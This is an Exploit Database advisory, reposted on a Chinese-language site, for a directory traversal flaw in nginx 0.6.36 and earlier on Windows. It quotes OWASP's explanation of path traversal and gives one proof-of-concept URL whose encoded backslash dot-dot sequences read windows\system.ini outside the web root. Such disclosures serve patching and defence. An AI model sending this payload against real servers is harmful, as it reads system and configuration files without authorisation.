Nginx 0.6.36 – Directory Traversal

• Exploit Database
• 15 阅读

• 作者： cp77fk4r
  日期： 2010-05-30
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/12804/

• # Exploit Title: nginx [engine x] http server <= 0.6.36 Path Draversal
  # Date: 20/05/10
  # Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
  # Software Link: http://nginx.org/
  # Version: <= 0.6.36
  # Tested on: Win32
  #
  ##[Path Traversal:]
  A Path Traversal attack aims to access files and directories that are stored
  outside the web root folder. By browsing the application, the attacker looks
  for absolute links to files stored on the web server. By manipulating
  variables that reference files with “dot-dot-slash (../)” sequences and its
  variations, it may be possible to access arbitrary files and directories
  stored on file system, including application source code, configuration and
  critical system files, limited by system operational access control. The
  attacker uses “../” sequences to move up to root directory, thus permitting
  navigation through the file system. (OWASP)
  #
  http://localhost/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem.ini
  #
  #
  [e0f]